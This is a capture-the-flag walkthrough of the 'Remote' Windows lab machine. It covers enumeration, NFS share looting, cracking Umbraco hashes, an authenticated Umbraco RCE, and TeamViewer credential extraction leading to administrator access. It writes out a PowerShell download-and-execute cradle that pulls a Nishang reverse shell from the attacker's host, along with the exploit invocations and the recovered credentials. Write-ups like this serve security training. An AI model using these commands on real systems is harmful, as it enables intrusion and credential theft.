Remote is an easy difficulty Windows machine that features an Umbraco CMS installation. Credentials are found in a world-readable NFS share. Using these, an authenticated Umbraco CMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, from which we can gain a password. This password has been reused with the local administrator account. Using psexec with these credentials returns a SYSTEM shell.

Enumeration

First I check for available open ports.

nmap -p- --min-rate=10000 10.10.10.180

nmap -sC -sV -p21,22,80,135,139,445,5985,39517 10.10.10.180 -oA ./nmap/remote

|Ports|Service
|21| ftp Microsoft ftpd
|80| http Microsoft HTTPAPI httpd 2.0
|111| rpcbind
|139| netbios-ssn Microsoft Windows netbios-ssn
|445| microsoft-ds
|2049| nlockmgr
|5985| Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

First I checked the FTP server. It allowed for anonymous login but it was empty.

Next, I check out the website. On the /people there are some names we can take notes of.

I ran dirsearch in the background and found some interesting directories.

1
dirsearch -u http://10.10.10.180 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -t 20 -f -e php,txt,html,aspx

We can find a login page at /umbraco which is a CME.

We can find a NFS share.

Let’s mount the share.

1
2
3
mkdir target-NFS
sudo mount -t nfs 10.10.10.180:/site_backups ./target-NFS -o nolock
cd target-NFS

Foothold

After looking for a bit I found Umbraco.sdf and we can password hashes for users inside it

I used crackstation

Creds → [email protected] : baconandcheese

I can now log into the website admin panel.

After looking for a bit I found this authenticated RCE exploit from ExploitDB. I downloaded the Python file and checked out the payload.
It takes the user and password for authentication, takes the type of shell and uses arguments to execute.

We have RCE on the server now.

1
python3 payload.py -u "[email protected]" -p "baconandcheese" -i "http://10.10.10.180" -c powershell.exe -a "whoami"

Next, I used Nishang Invoke-PowerShellTcp.ps1 to get a shell.

At the bottom of the PowerShell script, I added my reverse shell IP and port.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 4444

Then hosted the payload using the python3 server.

python3 -m http.server

After that I used RCE payload to download my PowerShell script and get a shell

1
python3 payload.py -u "[email protected]" -p "baconandcheese" -i "http://10.10.10.180" -c powershell.exe -a "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/Invoke-PowerShellTcp.ps1')"

Privilege Escalation

In tasklist We can see TeamViewer_Service.exe

After looking for a bit I found this CVE-2019-18988 where Teamviwer leaking creds.

We can leak the creds using this

reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7

Next, I used this decryptor to decrypt the password.

Creds → administrator : !R3m0te!

Now we can use WINRM to log in and get the flag.